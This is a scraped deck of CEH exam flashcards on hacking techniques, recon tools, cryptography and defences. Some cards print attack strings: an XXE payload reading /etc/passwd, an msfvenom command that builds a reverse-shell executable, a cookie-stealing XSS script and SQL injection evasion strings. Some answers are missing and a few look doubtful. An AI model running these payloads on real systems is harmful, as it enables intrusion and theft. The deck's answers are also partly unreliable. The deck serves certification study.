ceh Flashcards

1
Q

Which web vulnerability would an attacker be attempting to exploit if they delivered the following input: <!DOCTYPE blah [ < !ENTITY trustme SYSTEM “file:///etc/passwd” > ] > *

A

XXE

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Which Nmap switch helps evade IDS or firewalls?*

A

-D

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Which type of SQL injection attack extends the results returned by the original query, enabling attackers to run two or more statements if they have the same structure as the original one?*

A

Union SQL injection

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Emily posts a large amount of private info, photos, and location tags of recently visited places. James targets Emily and her acquaintances to conduct a location search to detect their geolocating by using an automated tool and gathering information to perform other sophisticated attacks. What is the tool employed by James in the above scenario?*

A

Hootsuite

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Abel, cloud architect, uses container tech to deploy applications/software, including all its dependencies, such as libraries and config files, binaries, and other resources that run independently from other processes in the cloud environment. For the containerization of applications, he follows the five-tier container technology architecture. Currently, Abel is verifying and validating image contents, singing images, and sending them to the registries. Which tier of the container tech architecture is Abel currently working in? *

A

Tier-2: Testing and accreditation systems

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

During the enumeration phase, Lawrence performs banner grabbing to obtain info such as OS details and versions of services running. The service that he enumerated runs directly on TCP port 445. Which service is enumerated by Lawrence in this scenario?*

A

Server Message Block (SMB)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

What is the correct way of using MSF venom to generate a reverse TCP shellcode for Windows?*

A

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Keatron performed a vulnerability scan on a target organization by sniffing the traffic on the network to identify the active systems, network services, applications, and vulnerabilities. He also obtained the list of the users who are currently accessing the network. What type of vulnerability assessment did Keaton perform on the target organization?*

A

Passive assessment

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Bobby targets the infrastructure of an org. After preparing for the attack, he attempts to enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Using these techniques, he successfully deployed malware on the target system to establish an outbound connection. What APT lifecycle phase is currently executing?*

A

Initial intrusion

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

At what stage of the cyber kill chain theory model does data exfiltration occur?*

A

Actions on objectives

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Bella/Jason finds that a security breach has occurred while transferring important files. Sensitive data, employee usernames, and passwords are shared in plaintext4, allowing hackers to perform successful session hijacking. To address this situation, Jason implemented a protocol that sends data using encryption and digital certificates. Which of the following protocols is used by Jason?*

A

FTPS

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

This wireless security protocol allows 192-bit minimum-strength security protocols and cryptographic tools to protect sensitive data, such as GCMP-256, HMAC-SHA384, and ECDSA using a 384-bit elliptic curve. Which is this wireless security protocol?*

A

WPA3-Enterprise

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

What is the file that determines the basic configuration (specifically activities, services, broadcast receivers, etc.) in an Android application?*

A

AndroidManifest.xml

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

You have been authorized to perform a penetration test against a website. You want to use Google dorks to footprint the site but only want results that show file extensions. What Google dork operator would you use?*

A

file type

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

Alice targeted an organization’s cloud services. She infiltrated the target’s MSP provider by sending spear-phishing emails and distributed custom-made malware to compromise user accounts and gain remote access to the cloud service. Further, she accessed the target customer profiles with her MSP account, compressed the customer data, and stored them in the MSP. Then, she used this information to launch further attacks on the target organization. Which cloud attack did Alice perform in the above scenario?*

A

Cloud hopper attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

Susan wants her web API to update other applications with the latest information. She uses a user-defined HTTP callback or push APIs that are raised based on trigger events; when invoked, this feature supplies data to other applications so that users can instantly receive real-time information. Which technique is employed by Susan?*

A

Webhooks

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

In this from of encryption algorithm every individual block contains 64-bit data, and three keys are used, where each key consists of 56 bits. Which is this encryption algorithm?*

A

Triple Data Encryption Standard

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

An attacker redirects the victim to malicious websites by sending them a malicious link by email. The link appears authentic but redirects the victim to a malicious web page, which allows the attacker to steal the victim’s data. What type of attack is this?*

A

Phishing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

Richard targets an MNC. He uses a footprinting technique to gather as much information as possible. He gathers domain info such as the target domain name, contact details of its owner, expiry date, and creation date. With the info, he creates a map of the organization’s network and misleads domain owners with social engineering to obtain internal details of its network. What type of footprinting technique is employed?*

A

Whois footprinting

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

Robin targeted an organizations’ network to sniff all the traffic. During the process he plugged in a rogue switch to an unused port in the LAN with a priority lower than any other switch in the network so that he could make it a root bridge that will later allow him to sniff all the traffic in the network. What is the attack performed by Robin in the above scenario?*

A

STP attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

Bobby targeted a user and decided to hijack and intercept all their wireless communications. He installed a fake communication tower between two authentic endpoints to mislead the victim. Bobby used the virtual tower to interrupt data transmissions between the user and real tower, attempting to hijack an active session. Upon receiving the user’s request, he manipulated the traffic with the virtual tower and redirected the victim to a malicious web site. What is the attack performed?*

A

aLTEr attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

Dorian is sending a digitally signed email to Polly. With which key is Dorian signing this message and how is Polly validating it?*

A

Dorian is signing the message with his private key, and Polly will verify that the message came from Dorian by using Dorian’s public key.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

Annie uses the Docker architecture to employ a client/server model in the application she is working on. She utilizes a component that can process API requests and handle various Docker objects, such as containers, volumes, images, and networks. What is the component of the Docker architecture used?*

A

Docker daemon

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

What is the common name for a vulnerability disclosure program opened by companies in platforms such as HackerOne?*

A

Bug bounty program

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q

Which Bluetooth hacking technique refers to the theft of information from a wireless device through Bluetooth?*

A

Bluesnarfing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
26
Q

While testing a web application in development, you notice that the web server does not properly ignore the “dot dot slash” (../) character string and instead returns the file listing of a folder higher up in the folder structure of the server. What kind of attack is possible in this scenario?*

A

Directory traversal

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
27
Q

Matt sees a picture one of his friends posted with the caption, “Learn more about your friends!”, as well as a number of personal questions. Matt is suspicious and texts his friend, who confirms that he did post it. With assurance that the post is legitimate, Matt responds to the questions on the post. A few days later, Matt’s bank account has been accessed, and the password has been changed. What most likely happened?*

A

Matt inadvertently provided the answers to his security questions when responding to the post.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
28
Q
  1. Victim opens the attacker’s web site.
  2. Attacker sets up a web site which contains interesting and attractive content like
    ‘Do you want to make $1000 in a day?’
  3. Victim click to the interesting and attractive content URL.
  4. Attacker creates a transparent ‘iframe’ in front of the URL which the victim attempts to click, so the victim thinks that he/she clicks on the ‘Do you want to make $1000 in a day?’ URL but actually he/she clicks on the content or URL that exists in the transparent ‘iframe’ which is setup b the attacker.
    What is the name of the attack which is mentioned in the scenario?*
A

ClickJacking Attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
29
Q

James scanned an organization by building an inventory of the protocols found on the organization’s machines to detect which ports are attached to services such as an email server, a web server, or a database server. After identifying the services, he selected the vulnerabilities on each machine and started executing only the relevant tests. What is the type of vulnerability assessment solution that James employed in the scenario?*

A

Inference-based assessment

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
30
Q

Samuel is assessing the configuration of a web server. He noticed that the server permits SSLv2 connections, and the same private key certificate is used on a different server that allows SSLv2 connections. This vulnerability makes the web server vulnerable to attacks as the SSLv2 server can leak key information. Which attack can be performed by exploiting the vulnerability?*

A

DROWN attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
31
Q

In the Common Vulnerability Scoring System (CVSS) v3.1 severity ratings, what range does medium vulnerability fall in?*

A

4.0-6.9

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
32
Q

You start performing a penetration test against specific website and have decided to start from grabbing all the links from the main page. What is the best Linux pipe to achieve your milestone?*

A

$ curl -s http://example.com/ | grep ‘<a href’ | cut -d”"” -f2

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
33
Q

SQL injection (SQLi) attacks attempt to inject SQL syntax into web requests, which may bypass authentication and allow attackers to access and/or modify data attached to a web application. Which SQLi type leverages a database server’s ability to make DNS requests to pass data to an attacker?*

A

Out-of-band SQLi

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
34
Q

Wilson targets an organization for financial benefit and plans to compromise its systems by sending malicious emails. He uses a tool to track the emails of the target and extracts information such as sender identities, mail servers, sender IP addresses, and sender locations from different public sources. He also checks if an email address was leaked using the haveibeenpwned.com API. Which tool is used by Wilson in the above scenario?*

A

Infoga

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
35
Q

Allen was hired by XpertTech Solutions to perform an attack simulation on the organization’s network resources. To perform the attack he took the advantage of the NetBIOS API and targeted the NetBIOS service. By enumerating NetBIOS, he found that port 139 was open and could see the resources that could be accessed or viewed on a remote system. He came across many NetBIOS codes during enumeration. Identify the NetBIOS code used for obtaining the messenger service running for the logged-in user?*

A

< 03 >

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
36
Q

To create a botnet the attacker can use several techniques to scan vulnerable machines. The attacker first collects info about a large number of vulnerable machines to create a list. Subsequently, they infect the machines. The list is divided by assigning half of the list to the newly compromised machines. The scanning process runs simultaneously. This technique ensures the spreading and installation of malicious code in little time. Which technique is discussed?*

A

Hit-list scanning technique

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
37
Q

John wants to send Marie an email that includes sensitive information, and he does not trust the network that he is connected to. Marie gives him the idea of using PGP. What should John do to communicate correctly using this type of encryption?*

A

Use Marie’s public key to encrypt the message

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
38
Q

What is the port to block first in case you are suspicious that an IoT device has been compromised?*

A

48101

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
39
Q

A penetration tester is performing the footprinting process and is reviewing publicly available information about an organization by using the Google search engine. Which advanced operator would allow the pen tester to restrict the search to the organization’s web domain?*

A

[site:]

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
40
Q

After an audit, the auditors inform you that there is a critical finding that you must tackle immediately. You read the audit report, and the problem is the service running on port 389. Which service is this and how can you tackle the problem?*

A

The service is LDAP, and you must change it to 636, which is LDAPS

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
41
Q

Steve targeted an organization’s network with the aim of redirecting the company’s web traffic to another malicious website. To achieve this, Steve performed DNS cache poisoning by exploiting the vulnerabilities in the DNS server software and modified the original IP address of the target website to that of a fake website. What is the technique employed to gather info for identity theft?*

A

Pharming

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
42
Q

Kevin wants to penetrate CyberTech Inc.’s network. He employed a technique using which he encoded packets with Unicode characters. The company’s IDS cannot recognize the packets, but the target web server can decode them. What is the technique used by Kevin to evade the IDS system?*

A

Obfuscating

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
43
Q

Boney targets an organization for financial benefits. He performs an attack by sending his session ID using a MITM attack technique. Boney first obtains a valid session ID by logging into a service and later feeds the same session ID to the target employee. The session ID links the target employee to Boney’s account page without disclosing any information to the victim. When the target employee clicks on the link, all the sensitive payment details entered in a form are linked to Boney’s account. What is the attack performed by Boney in the above scenario?*

A

Session donation attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
44
Q

Jim targeted an organization that is operating critical industrial infrastructure. He used Nmap to scan open ports and running services on systems connected to the organization’s OT network. He used an Nmap command to identify Ethernet/IP devices connected to the Internet and further gathered information such as the vendor name, product code and name, device name, and IP address. Which Nmap command helped Jim retreive the required information?*

A

nmap -Pn -sU -p 44818 –script enip-info < Target IP >

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
45
Q

Daniel is a professional hacker who is attempting to perform an SQL injection attack on a target website, www.moviescope.com. During this process, he encountered an IDS that detects SQL injection attempts based on predefined signatures. To evade any comparison statement, he attempted placing characters such as “’or ‘1’=’1’” in any basic injection statement such as “or 1=1.” Identify the evasion technique used by Daniel in the above scenario.*

A

Variation

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
46
Q

Jane Doe is attempting to crack the password of the head of the IT department of ABC company. She is utilizing a rainbow table and notices upon entering a password that extra characters are added to the password after submitting. What countermeasure is the company using to protect against rainbow tables?*

A

Password salting

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
47
Q

Lauren has gained the credentials of an organization’s internal server system, and she was often logging in during irregular times to monitor the network activities. The organization was skeptical about the login times and appointed security professional Robert to determine the issue. Robert analyzed the compromised device to find incident details such as the type of attack, its severity, target, impact, method of propagation, and vulnerabilities exploited. What is the incident handling and response (IH&R) phase, in which Robert has determined these issues?*

A

Incident triage

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
48
Q

George was tasked with securely transferring sensitive data of his organization between industrial systems. In this process he used a short-range communication protocol based on the IEEE 203.15.4 standard. This protocol is used in devices that transfer data infrequently at a low rate in restricted area, within a range of 10-100 m. What is the short-range wireless communication technology George employed in the above scenario?*

A

Zigbee

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
49
Q

Taylor uses a tool to monitor her company’s website, analyze the website’s traffic, and track the geographical location of the users visiting the company’s website. Which tool did Taylor employ in the scenario?*

A

Web-Stat

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
50
Q

Mr. Omkar performed tool-based vulnerability assessment and found two vulnerabilities. During further analysis, he found that those issues are not true vulnerabilities. What will you call these issues?*

A

False positives

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
51
Q

Gilbert uses a centralized web API to reduce complexity and increase the integrity of updating and changing data. For this purpose he uses a web service that uses HTTP methods such as PUT, POST, GET, and DELETE and can improve the overall performance, visibility, scalability, reliability, and portability of an application. What is the type of web-service API mentioned in the above scenario?*

A

RESTful API

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
52
Q

Jason targeted an organization to perform an attack on its Internet-facing web server with the intention of gaining access to backend servers, which are protected by a firewall. In this process, he used a URL
https://xyz.com/feed.php?url=externalsite.com/feed/to
to obtain a remote feed and altered the URL input to the
local host to view all the local resources on the target server. What is the type of attack Jason performed in the above scenario?*

A

Server-side request forgery (SSRF) attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
53
Q

Widespread fraud at Enron, WorldCom, and Tyco led to the creation of a law that was designed to improve the accuracy and accountability of corporate disclosures. It covers accounting firms and third parties that provide financial services to some organizations and came into effect in 2002. This law is known by what acronym? *

A

SOX

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
54
Q

Bob was recently hired by a medical company after it experienced a major cyber security breach. Many patients are complaining that their personal medical records are fully exposed on the Internet and someone can find them with a simple Google search. Bob’s boss is very worried because of regulations that protect those data. Which regulation is mostly violated?*

A

HIPAA/PHI

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
55
Q

Sam was asked to perform port scanning on a target host in the network. While performing the given task, Sam sends FIN/ACK probes and determines that an RST packet is sent in response by the target host, indicating that the port is closed. What is the port scanning technique used by Sam to discover open ports?*

A

TCP Maimon scan

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
56
Q

A new employee, Janet, has been allocated an existing system used by a previous employee. Before issuing the system to Janet, it was assessed by Martin, the administrator. Martin found that there were possibilities of compromise through user directories, registries, and other system parameters. He also identified vulnerabilities such as native configuration tables, incorrect registry of file permissions, and software configuration errors. What is the type of vulnerability assessment performed by Martin?*

A

Host-based assessment

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
57
Q

John performs a network attack on a renowned organization and gains unauthorized access to the target network. He remains in the network without being detected for a long time and obtains sensitive information without sabotaging the organization. Which of the following attack techniques is used by John?*

A

Advanced persistent threat

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
58
Q

Jane is testing a target organization’s web server and website to identify security loopholes. In this process, she copied the entire website and its contents on a local drive to view the complete profile of the site’s directory structure, file structure, external links, images, web pages, and so on. This info helps Jane map the website’s directories and gain valuable info. What is the attack technique employed by Jane in the scenario?*

A

Website mirroring

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
59
Q

In this attack, an adversary tricks a victim into reinstalling an already-in-use key. This is achieved by manipulating and replaying cryptographic handshake messages. When the victim reinstalls the key, associated parameters such as the incremental transmit packet number and receive packet number are reset to their initial values. What is this attack called? *

A

KRACK

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
60
Q

If you send a TCP ACK segment to a known closed port on a firewall but it does not respond with an RST, what do you know about the firewall you are scanning?*

A

It is a stateful firewall

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
61
Q

Which iOS jailbreaking technique patches the kernel during the device boot so that it becomes jailbroken after each successive reboot?*

A

Untethered jailbreaking

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
62
Q

Garry uses SNMP to manage networked devices from a remote location. To manage nodes in the network, he uses MIB, which contains formal descriptions of all network objects managed by SNMP. He accesses the contents of MIB by using a web browser either by entering the IP address and Lseries.mib or by entering the DNS library name and Lseries.mib. He is currently retrieving information from an MIB that contains object types for workstations and server services. Which of the following types of MIB is accessed by Garry in the scenario?*

A

LNMIB2.MIB

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
63
Q

Clark was hired by an organization to gather sensitive information about its competitors surreptitiously. Clark gathers the server IP address of the target organization using Whois footprinting. Further, he entered the server IP address as an input to an online tool to retrieve information such as the network range of the target organization and to identify the network topology and operating system used in the network. What is the online tool employed by Clark in the scenario?*

A

ARIN

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
64
Q

Jim/Clark created and configured multiple domains pointing to the same host to switch quickly between the domains and avoid detection. Identify the behavior of the adversary in the above scenario. *

A

Unspecified proxy activities

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
65
Q

You are a penetration tester tasked with testing the wireless network of your client Brakeme SA. You are attempting to break into the wireless network with the SSID “Brakeme-Internal.” You realize that this network uses WPA3 encryption. Which of the following vulnerabilities is the promising to exploit?*

A

Dragonblood

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
66
Q

Henry was tasked with discovering the operating system (OS) of a host. He used the Unicornscan tool to discover the OS of the target system. As a result, he obtained a TTL value, which indicates that the target system is running a Windows OS. Identify the TTL value Henry obtained, which indicates that the target OS is Windows*.

A

128

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
67
Q

Andrew was assigned the task of discovering all the active devices hidden by a restrictive firewall in the IPv4 range in a given target network. Which of the following host discovery techniques must he use to perform the given task?*

A

ARP ping scan

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
68
Q

Ralph targeted Jane who had recently bought new systems for her company. After a few days, Ralph contacted Jane while masquerading as a legitimate customer support executive, informing that her systems need to be serviced for proper functioning and that customer support will send a computer technician. Jane promptly replied positively. Ralph entered Jane’s company using this opportunity and gathered sensitive information by scanning terminals for passwords, searching for important documents in desks, and rummaging bins. What is the type of attack technique Ralph used on Jane?*

A

Impersonation

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
69
Q

In an attempt to increase the security of your network, you implement a solution that will help keep your wireless network undiscoverable and accessible only to those that know it. How do you accomplish this?*

A

Disable SSID broadcasting

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
70
Q

Jane invites her friends Alice and John over for a LAN party. Alice and John access Jane’s wireless network without a password. However, Jane has a long, complex password on her router. What attack has likely occurred?*

A

Evil twin

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
71
Q

Which file is a rich target to discover the structure of a website during webserver footprinting?*

A

Robots.txt

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
72
Q

John targeted an organization that uses LDAP for accessing distributed directory services. He used an automated tool to anonymously query the LDAP service for sensitive information such as usernames, addresses, departmental details, and server names to launch further attacks on the target organization. What is the tool employed by John to gather information form the LDAP service? *

A

JXplorer

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
73
Q

Sam targeted an organization with intention of compromising AWS IAM credentials. He attempted to lure one of the employees of the organization by initiating fake calls while posing as a legitimate employee. Moreover, he sent phishing emails to steal the AWS IAM credentials and further compromise the employee’s account. What is the technique used by Sam to compromise the AWS IAM credentials? *

A

Social engineering

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
74
Q

This form of encryption algorithm is a symmetric key block cipher that is characterized by a 128-bit block size, and its key size can be up to 256 bits. Which among the following is this encryption algorithm?*

A

Twofish encryption algorithm

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
75
Q

Bob has managed to access a target IoT device. He employed an online tool to gather information related to the model of the IoT device and the certifications granted to it. Which tool did Bob employ to gather the above information? *

A

FCC ID search

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
76
Q

Alice needs to send a confidential document to her coworker, Bryan. Their company has public key infrastructure set up. Therefore, Alice both encrypts the message and digitally signs it. Alice uses _________ to encrypt the message, and Bryan uses _________ to confirm the digital signature.*

A

Bryan’s public key; Alice’s public key

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
77
Q

David is implementing a vulnerability management program in the organization to evaluate and control the risks and vulnerabilities in its IT infrastructure. He is currently executing the process of applying fixes on vulnerable systems to reduce the impact and severity of vulnerabilities. Which phase of the vulnerability-management life cycle is David currently in?*

A

Remediation

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
78
Q

There are multiple cloud deployment options depending on how isolated a customer’s resources are from those of other customers. Shared environments share the costs and allow each customer to enjoy lower operations expenses. One solution is for a customer to join with a group of users or organizations to share a cloud environment. What is this cloud deployment option called?*

A

Community

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
79
Q

An organization has automated the operation of critical infrastructure from a remote location. For this purpose, all the industrial control systems are connected to the Internet. To empower the manufacturing process, ensure the reliability of industrial networks, and reduce downtime and service disruption, the organization decided to install an OT security tool that further protects against security incidents such as cyber espionage, zero-day attacks, and malware. Which tool must the organization to protect its critical infrastructure?*

A

Flowmon

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
80
Q

What are common files on a web server that can be misconfigured and provide useful information for a hacker such as verbose error messages? *

A

php.ini

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
81
Q

To invisibly maintain access to a machine, an attacker utilizes a rootkit that sits undetected in the core components of the operating system. What is this type of rootkit an example of?*

A

Kernel rootkit

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
82
Q

Which information security control creates an appealing isolated environment for hackers to prevent them from compromising critical targets while simultaneously gathering information about the hacker?*

A

Honeypot

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
83
Q

Sam captured the principal characteristics of a vulnerability and produced a numerical score to reflect its severity using CVSS v3.0 to properly assess and prioritize the organization’s vulnerability management processes. The base score that Sam obtained after performing CVSS rating was 4.0. What is the CVSS severity level of the vulnerability discovered by Sam in the scenario?

A

Medium

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
84
Q

Bill wants to eliminate unencrypted traffic inside his company’s network. He decides to setup a SPAN port and capture all traffic to the datacenter. He immediately discovers unencrypted traffic in port UDP 161. What protocol is this port using and how can he secure that traffic?*

A

SNMP and he should change it to SNMP v3

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
85
Q

Larry has noticed some abnormalities in the user accounts on a web server. To thwart evolving attacks, he decided to harden the security of the web server by adopting a few countermeasures to secure the accounts on the web server. Which countermeasure must Larry implement to secure the user accounts on the web server?*

A

Limit the administrator or root-level access to the minimum number of users

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
86
Q

Joe turns on his computer to access personal online banking. When he enters the URL www.bank.com, the website is displayed, but it prompts him to re-enter his credentials as if he has never visited the site before. When he examines the website URL closer, he finds that the site is not secure and the web address appears different. What type of attack he is experiencing?*

A

DNS hijacking

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
87
Q

What would be the fastest way to perform content enumeration on a given web server by using the Gobuster tool?*

A

Performing content enumeration using a wordlist

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
88
Q

Ricardo has discovered the username for an application in his target’s environment. As he has a limited amount of time, he decides to attempt to use a list of common passwords he found on the Internet. He compiles them into a list and then feeds that list as an argument into his password-cracking application. What type of attack is Ricardo performing?*

A

Dictionary

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
89
Q

Robin is attempting to bypass the firewalls of an organization through the DNS tunneling method in order to exfiltrate data. He is using the NSTX tool for bypassing the firewalls. On which port should Robin run the NSTX tool?*

A

Port 53

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
90
Q

Joe has set up a cloud computing service for the organization. To implement this service, he reached out to a telecom company for providing Internet connectivity and transport services between the organization and the cloud service provider. In the NIST cloud deployment reference architecture, under which category does the telecom company fall in the scenario?*

A

Cloud carrier

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
91
Q

Jane Smith is attempting to perform an SQL injection attack. She wants to test the response time of a true or false response and wants to use a second command to determine whether the database will return true or false results for user IDs. Which two SQL injection types would give her the results she is looking for?*

A

Time-based and boolean-based

92
Q

What piece of hardware on a computer’s motherboard generates encryption keys and only releases a part of the key so that decrypting a disk on a new piece of hardware is not possible? *

93
Q

A DDoS attack is performed at layer 7 to take down web infrastructure. Partial HTTP requests are sent to the web infrastructure or applications. Upon receiving a partial request, the target servers opens multiple connections and keeps waiting for the requests to complete. Which attack is being described here? *

A

Slowloris attack

94
Q

To tailor your tests during a web-application scan you decide to determine which web-server version is hosting the application. On using the sV flag with Nmap, you obtain the following response:

80/tcp open http-proxy Apache Server 7.1.6.

What information-gathering technique does this best describe?*

A

Banner grabbing

95
Q

What firewall evasion scanning technique make use of a zombie system that has low network activity as well as its fragment identification numbers? *

A

Idle scanning

96
Q

Nicolas found a vulnerability on a public-facing system that is considered a zeroday vulnerability. He sent an email to the owner of the public system describing the problem and how the owner can protect themselves from that vulnerability. He also sent an email to Microsoft informing them of the problem that their systems are exposed to. What type of hacker is Nicolas?*

97
Q

Gerard targets his ex-organization to perform sophisticated attacks and bring down its reputation in the market. To launch the attacks process, he performed DNS footprinting to gather info about DNS servers and to identify the hosts connected in the target network. He used an automated tool that can retrieve information about DNS zone data including DNS domain names, computer names, IP addresses, DNS records, and network Whois records. He further exploited this information to launch other sophisticated attacks. What is the tool employed by Gerard in the scenario? *

98
Q

A friend downloaded and executed a file that was sent to him by a coworker. Since the file did nothing when executed, he asks for help because he suspects that he may have installed a trojan on his computer. What test would you perform to determine whether his computer is infected? *

A

Upload the file to VirusTotal

99
Q

Richard aimed to hack IoT devices connected to a target network. In this process, Richard recorded the frequency required to share information between connected devices. After obtaining the frequency, he captured the original data when commands were initiated by the connected devices. Once the original data were collected, he used free tools such as URH to segregate the command sequence. Subsequently, he started injecting the segregated command sequence on the same frequency into the IoT network, which repeats the captured signals of the devices. What is the type of attack performed by Richard in the scenario?*

A

Replay attack

100
Q

John Smith has noticed abnormal amounts of traffic coming from local computers at night. Upon receiving, he finds that user data have been exfiltrated by an attacker. AV tools are unable to find any malicious software, and the IDS/IPS has not reported on any non-whitelisted programs. What type of malware did the attacker use to bypass the company’s application whitelisting?*

A

File-less malware

101
Q

Judy created a forum. One day, she discovers that a user is posting strange images without writing comments. She immediately calls a security expert, who discovers that the following code is hidden behind those images:

<script>
document.write(’<img src=”https://localhost/submitcookie.php? cookie =’+
escape(document.cookie) + ‘” />);
</script>

What issue occurred for the users who clicked on the image?*

A

This php file silently executes the code and grabs the user’s session cookie and session ID

102
Q

You are a penetration tester and are about to perform a scan on a specific server. The agreement that you signed with the client contains the following specific condition for the scan: “The attacker must scan every port on the server several times using a set of spoofed source IP addresses.” Suppose that you are using Nmap to perform this scan. What flag will you use to satisfy this requirement?*

A

The -D flag

103
Q

Heather’s company has decided to use a new customer relationship management tool. After performing the appropriate research, they decided to purchase a subscription to a cloud-hosted solution. The only administrative task that Heather will need to perform is the management of user accounts. The provider will take care of the hardware, operating system, and software administration including patching and monitoring. Which is this type of solution?*

104
Q

John is investigating web-application firewall logs and observes that someone
is attempting to inject the following:

char buff[10];
buff[10] = a;

What type of attack is this?*

A

Buffer Overflow

105
Q

Rony installed a rogue access point within an organization’s perimeter and attempted to intrude into its internal network. Johnson, a security auditor, identified some unusual traffic in the internal network that is aimed at cracking the authentication mechanism. He immediately turned off the targeted network and tested for any weak and outdated security mechanisms that are open to attack. What is the type of vulnerability assessment performed by Johnson in the scenario?*

A

Wireless network assessment

106
Q

Abel conducts penetration testing in his client organization to check for any security loopholes. He launched an attack on the DHCP servers by broadcasting forged DHCP requests and leases all the DHCP addresses available in the DHCP scope until the server could not issue any more IP addresses. This led to a DoS attack, and as a result, legitimate employees were unable to access the client’s network. Which of the attacks did Abel perform in the scenario?*

A

DHCP starvation

107
Q

John contacted a professional hacker to exploit his ex-organization. In the attack process, the professional hacker installed a scanner on a machine belonging to one of the victims and scanned several machines on the same network to identify vulnerabilities to perform further exploitation. What is the type of vulnerability assessment tool employed by John in the scenario?*

A

Agent-based scanner

108
Q

What is the first step for a hacker conducting a DNS cache poisoning (DNS spoofing) attack against an organization?*

A

The attacker queries a nameserver using the DNS resolver

109
Q

You are a penetration tester working to test the user awareness of the employees of the client XYZ. You harvested two employees’ emails from some public sources and are creating a client-side backdoor to send it to the employees via email. Which stage of the cyber kill chain are you at?*

A

Weaponization

110
Q

